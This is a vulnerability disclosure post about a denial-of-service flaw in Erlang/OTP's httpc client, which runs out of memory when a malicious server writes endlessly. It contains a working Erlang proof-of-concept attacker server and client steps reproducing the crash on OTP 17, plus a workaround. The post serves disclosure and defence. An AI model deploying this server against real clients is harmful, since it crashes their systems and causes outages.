Erlang OTP's httpc module Denial of Service

[Seba <argos83 () gmail com>]

Hi,

  I've reported this issue to erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-May/004369.html

Regards,

Sebastián Tello.


Using httpc to connect to a malicious server can cause the system to run
out of memory and crash.

Description
===========

When requesting a URL from an untrusted source using the httpc OTP module,
if the server:
 - accepts the connection
 - does not read from the socket
 - and indefinitely writes bytes in the socket.

Then the client will keep on allocating memory until the system crashes.

Proof of concept
================

Server-side (attacker):

==== PoC module: httpc_dos.erl ====
-module(httpc_dos).

-export([server/1, server/0]).

server() -> server(5678).
server(Port)->
  {ok, LSock} = gen_tcp:listen(Port, [binary, {packet, 0},
                                        {active, false}]),
  {ok, Sock} = gen_tcp:accept(LSock),
  socket_write(Sock).

socket_write(Sock) ->
    ok = gen_tcp:send(Sock, lists:flatten(lists:duplicate(4096, "A"))),
    socket_write(Sock).
======== EOF =====

Start the server (use the above module).

1> httpc_dos:server(5678).


Client-side (httpc), connect to the server:

$ erl
Erlang/OTP 17 [erts-6.0] [source] [64-bit] [smp:4:4] [async-threads:10]
[hipe] [kernel-poll:false]

Eshell V6.0  (abort with ^G)
1> application:start(inets).
ok
2> httpc:request("http://SERVER_IP:5678";).

Crash dump was written to: erl_crash.dump
eheap_alloc: Cannot allocate 1167696400 bytes of memory (of type "heap").

Tested on
=========
OTP 17
Ubuntu 12.04 x86_64

Workaround
==========

Use lhttpc (https://github.com/esl/lhttpc).I haven't been able to reproduce
the issue using lhttpc
as the call will crash when the response size is too large.